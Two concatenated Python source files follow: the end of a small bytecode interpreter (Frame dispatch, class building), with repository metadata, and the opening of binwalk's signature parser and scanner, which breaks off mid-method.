    def __init__(self, value):
        self.contents = value
class VirtualMachineError(Exception):
    """Raised when the virtual machine itself malfunctions."""
def run(code, f_globals, f_locals):
    """Execute *code*, supplying default global/local namespaces as needed."""
    if f_globals is None:
        f_globals = builtins.globals()
    if f_locals is None:
        f_locals = f_globals
    # Make sure the executed code can resolve builtin names.
    f_globals.setdefault('__builtins__', builtins.__dict__)
    return run_frame(code, None, f_globals, f_locals)
def run_frame(code, f_closure, f_globals, f_locals):
    """Build a Frame for *code* and interpret it to completion."""
    frame = Frame(code, f_closure, f_globals, f_locals)
    return frame.run()
class Frame:
    """One execution frame: a code object plus its value stack and namespaces.

    ``run`` drives a fetch/decode/dispatch loop over bytecode with 16-bit
    arguments (the pre-3.6 format), routing each opcode to a ``byte_<OPNAME>``
    method or to the generic unary/binary operator handlers.
    """
    def __init__(self, f_code, f_closure, f_globals, f_locals):
        self.f_code = f_code
        self.f_globals = f_globals
        self.f_locals = f_locals
        # '__builtins__' may be a module (at top level) or a dict; normalize
        # to a dict, falling back to a minimal one.
        self.f_builtins = f_globals.get('__builtins__')
        if isinstance(self.f_builtins, types.ModuleType):
            self.f_builtins = self.f_builtins.__dict__
        if self.f_builtins is None:
            self.f_builtins = {'None': None}
        self.stack = []
        self.f_lineno = f_code.co_firstlineno  # XXX doesn't get updated
        self.f_lasti = 0
        # Closure cells: fresh Cells for cellvars, inherited ones for freevars.
        self.cells = {} if f_code.co_cellvars or f_code.co_freevars else None
        for var in f_code.co_cellvars:
            self.cells[var] = Cell(self.f_locals.get(var))
        if f_code.co_freevars:
            assert len(f_code.co_freevars) == len(f_closure)
            self.cells.update(zip(f_code.co_freevars, f_closure))
    def __repr__(self): # pragma: no cover
        return ('<Frame at 0x%08x: %r @ %d>'
                % (id(self), self.f_code.co_filename, self.f_lineno))
    def run(self):
        """Interpret bytecode until RETURN_VALUE; return the value left on TOS."""
        while True:
            byte_name, arguments = self.parse_byte_and_args()
            outcome = self.dispatch(byte_name, arguments)
            if outcome:
                assert outcome == 'return'
                return self.pop()
    def parse_byte_and_args(self):
        """Decode the instruction at f_lasti into (opname, args-tuple)."""
        code = self.f_code
        opcode = code.co_code[self.f_lasti]
        self.f_lasti = self.f_lasti + 1
        if opcode >= dis.HAVE_ARGUMENT:
            # Pre-3.6 wordcode: a 16-bit little-endian argument follows.
            int_arg = ( code.co_code[self.f_lasti]
                       + (code.co_code[self.f_lasti+1] << 8))
            self.f_lasti = self.f_lasti + 2
            if opcode in dis.hasconst:
                arg = code.co_consts[int_arg]
            elif opcode in dis.hasfree:
                # Cell and free names share one index space: cellvars first.
                if int_arg < len(code.co_cellvars):
                    arg = code.co_cellvars[int_arg]
                else:
                    arg = code.co_freevars[int_arg - len(code.co_cellvars)]
            elif opcode in dis.hasname:
                arg = code.co_names[int_arg]
            elif opcode in dis.haslocal:
                arg = code.co_varnames[int_arg]
            elif opcode in dis.hasjrel:
                # Resolve relative jumps to absolute targets here.
                arg = self.f_lasti + int_arg
            else:
                arg = int_arg
            return dis.opname[opcode], (arg,)
        return dis.opname[opcode], ()
    def dispatch(self, byte_name, arguments):
        # Unary/binary arithmetic goes through the operator tables; every
        # other opcode maps to a byte_<OPNAME> method.  A truthy return
        # ('return') tells run() to stop this frame.
        if byte_name.startswith('UNARY_'):
            self.unary_operator(byte_name.replace('UNARY_', '', 1))
        elif byte_name.startswith('BINARY_'):
            self.binary_operator(byte_name.replace('BINARY_', '', 1))
        else:
            return getattr(self, 'byte_%s' % byte_name)(*arguments)
    # -- Value-stack helpers ------------------------------------------------
    def top(self):
        return self.stack[-1]
    def push(self, val):
        self.stack.append(val)
    def pop(self):
        return self.stack.pop()
    def popn(self, n):
        # Pop n values, returned in stack order (deepest first).
        vals = [self.stack.pop() for _ in range(n)]
        vals.reverse()
        return vals
    def jump(self, jump):
        # Jump targets are absolute bytecode offsets (see parse_byte_and_args).
        self.f_lasti = jump
    def byte_POP_TOP(self):
        self.pop()
    def byte_DUP_TOP(self):
        self.push(self.top())
    def byte_LOAD_CONST(self, const):
        self.push(const)
    def byte_LOAD_GLOBAL(self, name): # XXX not used by the compiler; just for comparison runs
        if name in self.f_globals: val = self.f_globals[name]
        elif name in self.f_builtins: val = self.f_builtins[name]
        else: raise NameError("name '%s' is not defined" % name)
        self.push(val)
    def byte_LOAD_NAME(self, name):
        # Lookup order: locals, then globals, then builtins.
        if name in self.f_locals: val = self.f_locals[name]
        elif name in self.f_globals: val = self.f_globals[name]
        elif name in self.f_builtins: val = self.f_builtins[name]
        else: raise NameError("name '%s' is not defined" % name)
        self.push(val)
    def byte_STORE_NAME(self, name):
        self.f_locals[name] = self.pop()
    def byte_LOAD_FAST(self, name):
        if name not in self.f_locals:
            raise UnboundLocalError(
                "local variable '%s' referenced before assignment" % name)
        self.push(self.f_locals[name])
    def byte_STORE_FAST(self, name):
        self.f_locals[name] = self.pop()
    def byte_LOAD_DEREF(self, name):
        self.push(self.cells[name].contents)
    def byte_STORE_DEREF(self, name):
        self.cells[name].contents = self.pop()
    UNARY_OPERATORS = {
        'POSITIVE': operator.pos, 'NOT': operator.not_,
        'NEGATIVE': operator.neg, 'INVERT': operator.invert,
    }
    def unary_operator(self, op):
        x = self.pop()
        self.push(self.UNARY_OPERATORS[op](x))
    BINARY_OPERATORS = {
        'POWER': pow, 'ADD': operator.add,
        'LSHIFT': operator.lshift, 'SUBTRACT': operator.sub,
        'RSHIFT': operator.rshift, 'MULTIPLY': operator.mul,
        'OR': operator.or_, 'MODULO': operator.mod,
        'AND': operator.and_, 'TRUE_DIVIDE': operator.truediv,
        'XOR': operator.xor, 'FLOOR_DIVIDE': operator.floordiv,
        'SUBSCR': operator.getitem,
    }
    def binary_operator(self, op):
        x, y = self.popn(2)
        self.push(self.BINARY_OPERATORS[op](x, y))
    # Indexed by the COMPARE_OP argument; order matches dis.cmp_op.
    COMPARE_OPERATORS = [
        operator.lt,
        operator.le,
        operator.eq,
        operator.ne,
        operator.gt,
        operator.ge,
        lambda x, y: x in y,
        lambda x, y: x not in y,
        lambda x, y: x is y,
        lambda x, y: x is not y,
        # 'exception match': x must be an Exception subclass matching y.
        lambda x, y: issubclass(x, Exception) and issubclass(x, y),
    ]
    def byte_COMPARE_OP(self, opnum):
        x, y = self.popn(2)
        self.push(self.COMPARE_OPERATORS[opnum](x, y))
    def byte_LOAD_ATTR(self, attr):
        obj = self.pop()
        val = getattr(obj, attr)
        self.push(val)
    def byte_STORE_ATTR(self, name):
        val, obj = self.popn(2)
        setattr(obj, name, val)
    def byte_STORE_SUBSCR(self):
        val, obj, subscr = self.popn(3)
        obj[subscr] = val
    def byte_BUILD_TUPLE(self, count):
        self.push(tuple(self.popn(count)))
    def byte_BUILD_LIST(self, count):
        self.push(self.popn(count))
    def byte_BUILD_MAP(self, size):
        # 'size' is only a hint; entries arrive later via STORE_MAP.
        self.push({})
    def byte_STORE_MAP(self):
        the_map, val, key = self.popn(3)
        the_map[key] = val
        self.push(the_map)
    def byte_UNPACK_SEQUENCE(self, count):
        # Push elements in reverse so the first element ends up on top.
        seq = self.pop()
        for x in reversed(seq):
            self.push(x)
    def byte_LIST_APPEND(self, count):
        # Append to the list 'count' entries down the stack (comprehensions).
        val = self.pop()
        self.stack[-count].append(val)
    def byte_JUMP_FORWARD(self, jump):
        self.jump(jump)
    def byte_JUMP_ABSOLUTE(self, jump):
        self.jump(jump)
    def byte_POP_JUMP_IF_TRUE(self, jump): # XXX not emitted by the compiler
        val = self.pop()
        if val:
            self.jump(jump)
    def byte_POP_JUMP_IF_FALSE(self, jump):
        val = self.pop()
        if not val:
            self.jump(jump)
    def byte_JUMP_IF_TRUE_OR_POP(self, jump):
        # Keep TOS and jump when truthy; otherwise discard it ('or'/'and').
        if self.top():
            self.jump(jump)
        else:
            self.pop()
    def byte_JUMP_IF_FALSE_OR_POP(self, jump):
        if not self.top():
            self.jump(jump)
        else:
            self.pop()
    def byte_SETUP_LOOP(self, dest):
        # No block stack is maintained, so loop setup is a no-op.
        pass
    def byte_GET_ITER(self):
        self.push(iter(self.pop()))
    def byte_FOR_ITER(self, jump):
        # Advance the iterator on TOS; on exhaustion pop it and jump past
        # the loop.  A unique sentinel distinguishes 'no more items'.
        void = object()
        element = next(self.top(), void)
        if element is void:
            self.pop()
            self.jump(jump)
        else:
            self.push(element)
    def byte_POP_BLOCK(self):
        # No block stack (see byte_SETUP_LOOP); nothing to pop.
        pass
    def byte_RAISE_VARARGS(self, argc):
        # Only the one-argument form ('raise exc') is supported.
        assert argc == 1
        raise self.pop()
    def byte_MAKE_FUNCTION(self, argc):
        # Stack: defaults..., code, qualname (qualname on top).
        name = self.pop()
        code = self.pop()
        defaults = self.popn(argc)
        self.push(Function(name, code, self.f_globals, defaults, None))
    def byte_LOAD_CLOSURE(self, name):
        self.push(self.cells[name])
    def byte_MAKE_CLOSURE(self, argc):
        # Like MAKE_FUNCTION, with a tuple of closure cells below the code.
        name = self.pop()
        closure, code = self.popn(2)
        defaults = self.popn(argc)
        globs = self.f_globals
        self.push(Function(name, code, globs, defaults, closure))
    def byte_CALL_FUNCTION(self, arg):
        return self.call_function(arg, [], {})
    def byte_CALL_FUNCTION_VAR(self, arg):
        varargs = self.pop()
        return self.call_function(arg, varargs, {})
    def byte_CALL_FUNCTION_KW(self, arg):
        kwargs = self.pop()
        return self.call_function(arg, [], kwargs)
    def byte_CALL_FUNCTION_VAR_KW(self, arg):
        varargs, kwargs = self.popn(2)
        return self.call_function(arg, varargs, kwargs)
    def call_function(self, oparg, varargs, kwargs):
        # oparg encoding: low byte = #positional args, high byte = #keyword
        # (name, value) pairs on the stack above them.
        len_kw, len_pos = divmod(oparg, 256)
        namedargs = dict([self.popn(2) for i in range(len_kw)])
        namedargs.update(kwargs)
        posargs = self.popn(len_pos)
        posargs.extend(varargs)
        func = self.pop()
        self.push(func(*posargs, **namedargs))
    def byte_RETURN_VALUE(self):
        return 'return'
    def byte_IMPORT_NAME(self, name):
        # XXX ceval.c is slightly different: looks up '__import__' in f_builtins first
        level, fromlist = self.popn(2)
        val = __import__(name, self.f_globals, self.f_locals, fromlist, level)
        self.push(val)
    def byte_IMPORT_FROM(self, name):
        # XXX ceval.c is slightly different: turns AttributeError into ImportError
        self.push(getattr(self.top(), name))
    def byte_LOAD_BUILD_CLASS(self):
        self.push(build_class)
def build_class(func, name, *bases, **kwds):
    """Replacement for __build_class__, pushed by LOAD_BUILD_CLASS.

    Runs the class-body function *func* in a fresh namespace, determines the
    winning metaclass, and calls it to create the class object.
    """
    if not isinstance(func, Function):
        raise TypeError("func must be a function")
    if not isinstance(name, str):
        raise TypeError("name is not a string")
    metaclass = kwds.pop('metaclass', None)
    if metaclass is None:
        metaclass = type(bases[0]) if bases else type
    if isinstance(metaclass, type):
        metaclass = calculate_metaclass(metaclass, bases)
    # If the metaclass defines __prepare__, it supplies the namespace the
    # class body executes in; otherwise use a plain dict.
    void = object()
    prepare = getattr(metaclass, '__prepare__', void)
    namespace = {} if prepare is void else prepare(name, bases, **kwds)
    cell = run_frame(func.__code__, func.__closure__,
                     func.__globals__, namespace)
    cls = metaclass(name, bases, namespace)
    # The class body may return a Cell (presumably its __class__ cell, for
    # zero-argument super() -- TODO confirm); patch the finished class in.
    if isinstance(cell, Cell):
        cell.contents = cls
    return cls
def calculate_metaclass(metaclass, bases):
    """Return the most derived metaclass among *metaclass* and the bases' types.

    Raises TypeError when the candidates are not totally ordered by
    subclassing (the classic "metaclass conflict").
    """
    winner = metaclass
    for candidate in (type(base) for base in bases):
        if issubclass(candidate, winner):
            winner = candidate
            continue
        if not issubclass(winner, candidate):
            raise TypeError("metaclass conflict", winner, candidate)
    return winner
| {
"repo_name": "darius/tailbiter",
"path": "byterun/interpreter.py",
"copies": "1",
"size": "14299",
"license": "mit",
"hash": -568898643610571900,
"line_mean": 31.8712643678,
"line_max": 94,
"alpha_frac": 0.5561228058,
"autogenerated": false,
"ratio": 3.5393564356435645,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9585294386630194,
"avg_score": 0.0020369709626740767,
"num_lines": 435
} |
# A pure Python replacement for libmagic. Supports most libmagic features, plus
# several additional features not provided by libmagic. Tailored specifically
# for quickly searching blocks of data for multiple embedded signatures.
__all__ = ['Magic']
import re
import struct
import datetime

import binwalk.core.common
import binwalk.core.compat
# Imported explicitly: SignatureResult subclasses binwalk.core.module.Result.
import binwalk.core.module
from binwalk.core.exceptions import ParserException
class SignatureResult(binwalk.core.module.Result):
    '''
    Container class for signature results.

    Default attribute values below may be overridden by signature keyword
    tags; tags can also set any other attribute, including those defined by
    binwalk.core.module.Result.
    '''
    def __init__(self, **kwargs):
        # Defaults set by signature keyword tags.
        self.jump = 0
        self.many = False
        self.adjust = 0
        self.strlen = 0
        self.string = False
        self.invalid = False
        self.once = False
        self.overlap = False
        # Set by code internally, not by tags.
        self.id = 0
        # Kwargs overrides the defaults set above.
        # Fixed: name the class explicitly rather than super(self.__class__, ...),
        # which recurses infinitely if this class is ever subclassed.
        super(SignatureResult, self).__init__(**kwargs)
        # Convenience flag derived from the (possibly tag-set) invalid flag.
        self.valid = (not self.invalid)
class SignatureLine(object):
    '''
    Responsible for parsing signature lines from magic signature files.

    After construction the important attributes are: level (indentation
    depth), offset (int or unevaluated expression string), type, operator /
    opvalue, condition, value (None for wildcards), size, pkfmt (struct
    format or None), format (printable description) and tags.
    '''
    # Printed strings are truncated to this size
    MAX_STRING_SIZE = 128
    def __init__(self, line):
        '''
        Class constructor. Responsible for parsing a line from a signature file.

        @line - A line of text from the signature file.

        Returns None.
        '''
        self.tags = {}
        self.text = line
        self.regex = False
        # Split the line on any white space; for this to work, backslash-escaped
        # spaces ('\ ') are replaced with their escaped hex value ('\x20').
        #
        # [offset] [data type] [comparison value] [format string]
        # 0        belong      0x12345678         Foo file type,
        # >4       string      x                  file name: %s,
        parts = line.replace('\\ ', '\\x20').split(None, 3)
        # Sanity check on the split line
        if len(parts) not in [3, 4]:
            raise ParserException("Invalid signature line: '%s'" % line)
        # The indentation level is determined by the number of '>' characters at
        # the beginning of the signature line.
        self.level = parts[0].count('>')
        # Get rid of the indentation characters and try to convert the remaining
        # characters to an integer offset. This will fail if the offset is a complex
        # value (e.g., '(4.l+16)'); complex offsets stay as strings and are
        # evaluated at scan time.
        self.offset = parts[0].replace('>', '')
        try:
            self.offset = int(self.offset, 0)
        except ValueError as e:
            pass
        # self.type is the specified data type ('belong', 'string', etc)
        self.type = parts[1]
        self.opvalue = None
        self.operator = None
        # Each data type can specify an additional operation to be performed on the
        # data being scanned before performing a comparison (e.g., 'belong&0xFF' will
        # AND the data with 0xFF before the comparison is performed).
        #
        # We support the following operators:
        for operator in ['&', '|', '*', '+', '-', '/', '~', '^']:
            # Look for each operator in self.type
            if operator in self.type:
                # If found, split self.type into the type and operator value
                (self.type, self.opvalue) = self.type.split(operator, 1)
                # Keep a record of the specified operator
                self.operator = operator
                # Try to convert the operator value into an integer. This works for
                # simple operator values, but not for complex types (e.g.,
                # '(4.l+12)').
                try:
                    self.opvalue = int(self.opvalue, 0)
                except ValueError as e:
                    pass
                # Only one operator type is supported, so break as soon as one
                # is found
                break
        # If the specified type starts with 'u' (e.g., 'ubelong'), then it is
        # unsigned; else, it is signed
        if self.type[0] == 'u':
            self.signed = False
            self.type = self.type[1:]
        else:
            self.signed = True
        # Big endian values start with 'be' ('belong'), little endian values start with 'le' ('lelong').
        # The struct module uses '>' to denote big endian and '<' to denote
        # little endian.
        if self.type.startswith('be'):
            self.type = self.type[2:]
            self.endianess = '>'
        elif self.type.startswith('le'):
            self.endianess = '<'
            self.type = self.type[2:]
        # Assume big endian if no endianess was explicitly specified
        else:
            self.endianess = '>'
        # Check the comparison value for the type of comparison to be performed (e.g.,
        # '=0x1234', '>0x1234', etc). If no operator is specified, '=' is implied.
        if parts[2][0] in ['=', '!', '>', '<', '&', '|', '^', '~']:
            self.condition = parts[2][0]
            self.value = parts[2][1:]
        else:
            self.condition = '='
            self.value = parts[2]
        # If this is a wildcard value, explicitly set self.value to None
        if self.value == 'x':
            self.value = None
        # String values need to be decoded, as they may contain escape
        # characters (e.g., '\x20')
        elif self.type == 'string':
            # String types support multiplication to easily match large
            # repeating byte sequences (e.g., 'AB*2*3' expands to 'AB' * 6).
            if '*' in self.value:
                try:
                    p = self.value.split('*')
                    self.value = p[0]
                    for n in p[1:]:
                        self.value *= int(n, 0)
                except KeyboardInterrupt as e:
                    raise e
                except Exception as e:
                    raise ParserException(
                        "Failed to expand string '%s' with integer '%s' in line '%s'" % (self.value, n, line))
            try:
                self.value = binwalk.core.compat.string_decode(self.value)
            except ValueError as e:
                raise ParserException(
                    "Failed to decode string value '%s' in line '%s'" % (self.value, line))
        # If a regex was specified, compile it
        elif self.type == 'regex':
            self.regex = True
            try:
                self.value = re.compile(self.value)
            except KeyboardInterrupt as e:
                raise e
            except Exception as e:
                raise ParserException(
                    "Invalid regular expression '%s': %s" % (self.value, str(e)))
        # Non-string types are integer values
        else:
            try:
                self.value = int(self.value, 0)
            except ValueError as e:
                raise ParserException(
                    "Failed to convert value '%s' to an integer on line '%s'" % (self.value, line))
        # Sanity check to make sure the first line of a signature has an
        # explicit value
        if self.level == 0 and self.value is None:
            raise ParserException(
                "First element of a signature must specify a non-wildcard value: '%s'" % (line))
        # Set the size and struct format value for the specified data type.
        # This must be done, obviously, after the value has been parsed out
        # above.
        if self.type == 'string':
            # Strings don't have a struct format value, since they don't have
            # to be unpacked
            self.fmt = None
            # If a string type has a specific value, set the comparison size to
            # the length of that string
            if self.value:
                self.size = len(self.value)
            # Else, truncate the string to self.MAX_STRING_SIZE
            else:
                self.size = self.MAX_STRING_SIZE
        elif self.type == 'regex':
            # Regular expressions don't have a struct format value, since they
            # don't have to be unpacked
            self.fmt = None
            # The size of a matching regex is unknown until it is applied to
            # some data
            self.size = self.MAX_STRING_SIZE
        elif self.type == 'byte':
            self.fmt = 'b'
            self.size = 1
        elif self.type == 'short':
            self.fmt = 'h'
            self.size = 2
        elif self.type == 'quad':
            self.fmt = 'q'
            self.size = 8
        # Assume 4 byte length for all other supported data types
        elif self.type in ['long', 'date']:
            self.fmt = 'i'
            self.size = 4
        else:
            raise ParserException(
                "Unknown data type '%s' in line '%s'" % (self.type, line))
        # The struct module uses the same characters for specifying signed and unsigned data types,
        # except that signed data types are upper case. The above if-else code sets self.fmt to the
        # lower case (unsigned) values.
        if not self.signed:
            self.fmt = self.fmt.upper()
        # If a struct format was identified, create a format string to be passed to struct.unpack
        # which specifies the endianess and data type format.
        if self.fmt:
            self.pkfmt = '%c%c' % (self.endianess, self.fmt)
        else:
            self.pkfmt = None
        # Check if a format string was specified (this is optional)
        if len(parts) == 4:
            # %lld formats are only supported if Python was built with HAVE_LONG_LONG
            self.format = parts[3].replace('%ll', '%l')
            # Regex to parse out tags, which are contained within curly braces
            retag = re.compile(r'\{.*?\}')
            # Parse out tag keywords from the format string
            for match in retag.finditer(self.format):
                # Get rid of the curly braces.
                tag = match.group().replace('{', '').replace('}', '')
                # If the tag specifies a value, it will be colon delimited
                # (e.g., '{name:%s}')
                if ':' in tag:
                    (n, v) = tag.split(':', 1)
                else:
                    n = tag
                    v = True
                # Create a new SignatureTag instance and append it to self.tags
                self.tags[n] = v
            # Remove all tags from the printable format string
            self.format = retag.sub('', self.format).strip()
        else:
            self.format = ""
class Signature(object):
    '''
    Class to hold signature data and generate signature regular expressions.
    '''
    def __init__(self, id, first_line):
        '''
        Class constructor.

        @id         - An ID value to uniquely identify this signature.
        @first_line - The first SignatureLine of the signature (subsequent
                      SignatureLines should be added via self.append).

        Returns None.
        '''
        self.id = id
        self.lines = [first_line]
        self.title = first_line.format
        self.offset = first_line.offset
        self.regex = self._generate_regex(first_line)
        # Confidence defaults to the magic byte count unless the first line
        # carries an explicit {confidence} tag.
        try:
            self.confidence = first_line.tags['confidence']
        except KeyError:
            self.confidence = first_line.size
    def _generate_regex(self, line):
        '''
        Generates a regular expression from the magic bytes of a signature.
        The regex is used by Magic._analyze.

        @line - The first SignatureLine object of the signature.

        Returns a compiled regular expression.
        '''
        restr = ""
        # Strings and single byte signatures are taken at face value;
        # multi-byte integer values are turned into regex strings based
        # on their data type size and endianess.
        if line.type == 'regex':
            # Regex types are already compiled expressions.
            # Note that since re.finditer is used, unless the specified
            # regex accounts for it, overlapping signatures will be ignored.
            return line.value
        if line.type == 'string':
            restr = line.value
        elif line.size == 1:
            restr = chr(line.value)
        elif line.size == 2:
            if line.endianess == '<':
                restr = chr(line.value & 0xFF) + chr(line.value >> 8)
            elif line.endianess == '>':
                restr = chr(line.value >> 8) + chr(line.value & 0xFF)
        elif line.size == 4:
            if line.endianess == '<':
                restr = (chr(line.value & 0xFF) +
                         chr((line.value >> 8) & 0xFF) +
                         chr((line.value >> 16) & 0xFF) +
                         chr(line.value >> 24))
            elif line.endianess == '>':
                restr = (chr(line.value >> 24) +
                         chr((line.value >> 16) & 0xFF) +
                         chr((line.value >> 8) & 0xFF) +
                         chr(line.value & 0xFF))
        elif line.size == 8:
            if line.endianess == '<':
                restr = (chr(line.value & 0xFF) +
                         chr((line.value >> 8) & 0xFF) +
                         chr((line.value >> 16) & 0xFF) +
                         chr((line.value >> 24) & 0xFF) +
                         chr((line.value >> 32) & 0xFF) +
                         chr((line.value >> 40) & 0xFF) +
                         chr((line.value >> 48) & 0xFF) +
                         chr(line.value >> 56))
            elif line.endianess == '>':
                restr = (chr(line.value >> 56) +
                         chr((line.value >> 48) & 0xFF) +
                         chr((line.value >> 40) & 0xFF) +
                         chr((line.value >> 32) & 0xFF) +
                         chr((line.value >> 24) & 0xFF) +
                         chr((line.value >> 16) & 0xFF) +
                         chr((line.value >> 8) & 0xFF) +
                         chr(line.value & 0xFF))
        # Since re.finditer is used on a per-signature basis, signatures should be crafted carefully
        # to ensure that they aren't potentially self-overlapping (e.g., a signature of "ABCDAB" could
        # be confused by the byte sequence "ABCDABCDAB"). The longer the signature, the less likely an
        # unintentional overlap is, although files could still be maliciously crafted to cause false
        # negative results.
        #
        # Thus, unless a signature has been explicitly marked as knowingly overlapping ('{overlap}'),
        # spit out a warning about any self-overlapping signatures.
        if not binwalk.core.compat.has_key(line.tags, 'overlap'):
            for i in range(1, line.size):
                if restr[i:] == restr[0:(line.size - i)]:
                    binwalk.core.common.warning(
                        "Signature '%s' is a self-overlapping signature!" % line.text)
                    break
        return re.compile(re.escape(restr))
    def append(self, line):
        '''
        Add a new SignatureLine object to the signature.

        @line - A new SignatureLine instance.

        Returns None.
        '''
        # This method is kind of useless, but may be a nice wrapper for future
        # code.
        self.lines.append(line)
class Magic(object):
'''
Primary class for loading signature files and scanning
blocks of arbitrary data for matching signatures.
'''
def __init__(self, exclude=[], include=[], invalid=False):
'''
Class constructor.
@include - A list of regex strings describing which signatures should be included in the scan results.
@exclude - A list of regex strings describing which signatures should not be included in the scan results.
@invalid - If set to True, invalid results will not be ignored.
Returns None.
'''
# Used to save the block of data passed to self.scan (see additional
# comments in self.scan)
self.data = ""
# A list of Signature class objects, populated by self.parse (see also:
# self.load)
self.signatures = []
# A set of signatures with the 'once' keyword that have already been
# displayed once
self.display_once = set()
self.dirty = True
self.show_invalid = invalid
self.includes = [re.compile(x) for x in include]
self.excludes = [re.compile(x) for x in exclude]
# Regex rule to replace backspace characters (an the preceeding character)
# in formatted signature strings (see self._analyze).
self.bspace = re.compile(".\\\\b")
# Regex rule to match printable ASCII characters in formatted signature
# strings (see self._analyze).
self.printable = re.compile("[ -~]*")
# Regex rule to find format strings
self.fmtstr = re.compile("%[^%]")
# Regex rule to find periods (see self._do_math)
self.period = re.compile("\.")
def _filtered(self, text):
'''
Tests if a string should be filtered out or not.
@text - The string to check against filter rules.
Returns True if the string should be filtered out, i.e., not displayed.
Returns False if the string should be displayed.
'''
filtered = None
# Text is converted to lower case first, partially for historical
# purposes, but also because it simplifies writing filter rules
# (e.g., don't have to worry about case sensitivity).
text = text.lower()
for include in self.includes:
if include.search(text):
filtered = False
break
# If exclusive include filters have been specified and did
# not match the text, then the text should be filtered out.
if self.includes and filtered is None:
return True
for exclude in self.excludes:
if exclude.search(text):
filtered = True
break
# If no explicit exclude filters were matched, then the
# text should *not* be filtered.
if filtered is None:
filtered = False
return filtered
    def _do_math(self, offset, expression):
        '''
        Parses and evaluates complex expressions, e.g., "(4.l+12)", "(6*32)", etc.

        @offset     - The offset inside self.data that the current signature starts at.
        @expression - The expression to evaluate.

        Returns an integer value that is the result of the evaluated expression.
        '''
        # Does the expression contain an offset (e.g., "(4.l+12)")?
        if '.' in expression and '(' in expression:
            replacements = {}
            for period in [match.start() for match in self.period.finditer(expression)]:
                # Separate the offset field into the integer offset and type
                # values (o and t respectively)
                s = expression[:period].rfind('(') + 1
                # The offset address may be an evaluatable expression, such as '(4+0.L)', typically the result
                # of the original offset being something like '(&0.L)'.
                o = binwalk.core.common.MathExpression(
                    expression[s:period]).value
                t = expression[period + 1]
                # Re-build just the parsed offset portion of the expression
                text = "%s.%c" % (expression[s:period], t)
                # Have we already evaluated this offset expression? If so, skip
                # it.
                # NOTE(review): this is binwalk.core.common.has_key, while the
                # rest of this file uses binwalk.core.compat.has_key -- confirm
                # both modules export it.
                if binwalk.core.common.has_key(replacements, text):
                    continue
                # The offset specified in the expression is relative to the
                # starting offset inside self.data
                o += offset
                # Read the value from self.data at the specified offset
                try:
                    # Byte format (sign-agnostic single byte)
                    if t in ['b', 'B']:
                        v = struct.unpack(
                            'b', binwalk.core.compat.str2bytes(self.data[o:o + 1]))[0]
                    # Little endian short format
                    elif t == 's':
                        v = struct.unpack(
                            '<h', binwalk.core.compat.str2bytes(self.data[o:o + 2]))[0]
                    # Little endian long format
                    elif t == 'l':
                        v = struct.unpack(
                            '<i', binwalk.core.compat.str2bytes(self.data[o:o + 4]))[0]
                    # Big endian short format
                    elif t == 'S':
                        v = struct.unpack(
                            '>h', binwalk.core.compat.str2bytes(self.data[o:o + 2]))[0]
                    # Big endian long format
                    elif t == 'L':
                        v = struct.unpack(
                            '>i', binwalk.core.compat.str2bytes(self.data[o:o + 4]))[0]
                # struct.error is thrown if there is not enough bytes in
                # self.data for the specified format type
                except struct.error as e:
                    v = 0
                # Keep track of all the recovered values from self.data
                replacements[text] = v
            # Finally, replace all offset expressions with their corresponding
            # text value
            v = expression
            for (text, value) in binwalk.core.common.iterator(replacements):
                v = v.replace(text, "%d" % value)
        # If no offset, then it's just an evaluatable math expression (e.g.,
        # "(32+0x20)")
        else:
            v = expression
        # Evaluate the final expression
        value = binwalk.core.common.MathExpression(v).value
        return value
    def _analyze(self, signature, offset):
        '''
        Analyzes self.data for the specified signature data at the specified offset.

        @signature - The signature to apply to the data.
        @offset    - The offset in self.data to apply the signature to.

        Returns a dictionary of tags parsed from the data.
        '''
        description = []
        tag_strlen = None  # NOTE(review): appears unused in this method
        max_line_level = 0
        previous_line_end = 0
        tags = {'id': signature.id, 'offset':
                offset, 'invalid': False, 'once': False}
        # Apply each line of the signature to self.data, starting at the
        # specified offset
        for n in range(0, len(signature.lines)):
            line = signature.lines[n]
            # Ignore indentation levels above the current max indent level
            if line.level <= max_line_level:
                # If the relative offset of this signature line is just an
                # integer value, use it
                if isinstance(line.offset, int):
                    line_offset = line.offset
                # Else, evaluate the complex expression
                else:
                    # Format the previous_line_end value into a string. Add the '+' sign to explicitly
                    # state that this value is to be added to any subsequent values in the expression
                    # (e.g., '&0' becomes '4+0').
                    ple = '%d+' % previous_line_end
                    # Allow users to use either the '&0' (libmagic) or '&+0' (explicit addition) syntaxes;
                    # replace both with the ple text.
                    line_offset_text = line.offset.replace(
                        '&+', ple).replace('&', ple)
                    # Evaluate the expression
                    line_offset = self._do_math(offset, line_offset_text)
                # Sanity check
                if not isinstance(line_offset, int):
                    raise ParserException(
                        "Failed to convert offset '%s' to a number: '%s'" % (line.offset, line.text))
                # The start of the data needed by this line is at offset + line_offset.
                # The end of the data will be line.size bytes later.
                start = offset + line_offset
                end = start + line.size
                # If the line has a packed format string, unpack it
                if line.pkfmt:
                    try:
                        dvalue = struct.unpack(
                            line.pkfmt, binwalk.core.compat.str2bytes(self.data[start:end]))[0]
                    # Not enough bytes left in self.data for the specified
                    # format size
                    except struct.error as e:
                        dvalue = 0
                # Else, this is a string
                else:
                    # Wildcard strings have line.value == None
                    if line.value is None:
                        # Check to see if this is a string whose size is known and has been specified on a previous
                        # signature line.
                        if binwalk.core.compat.has_key(tags, 'strlen') and binwalk.core.compat.has_key(line.tags, 'string'):
                            dvalue = self.data[start:(start + tags['strlen'])]
                        # Else, just terminate the string at the first newline,
                        # carriage return, or NULL byte
                        else:
                            dvalue = self.data[start:end].split(
                                '\x00')[0].split('\r')[0].split('\n')[0]
                    # Non-wildcard strings have a known length, specified in
                    # the signature line
                    else:
                        dvalue = self.data[start:end]
                # Some integer values have special operations that need to be performed on them
                # before comparison (e.g., "belong&0x0000FFFF"). Complex math expressions are
                # supported here as well.
                # if isinstance(dvalue, int) and line.operator:
                if line.operator:
                    try:
                        # If the operator value of this signature line is just
                        # an integer value, use it.
                        # NOTE(review): `long` does not exist on Python 3; this
                        # relies on the compat layer providing it -- confirm,
                        # otherwise non-int opvalues raise NameError here.
                        if isinstance(line.opvalue, int) or isinstance(line.opvalue, long):
                            opval = line.opvalue
                        # Else, evaluate the complex expression
                        else:
                            opval = self._do_math(offset, line.opvalue)
                        # Perform the specified operation
                        if line.operator == '&':
                            dvalue &= opval
                        elif line.operator == '|':
                            dvalue |= opval
                        elif line.operator == '*':
                            dvalue *= opval
                        elif line.operator == '+':
                            dvalue += opval
                        elif line.operator == '-':
                            dvalue -= opval
                        elif line.operator == '/':
                            dvalue /= opval
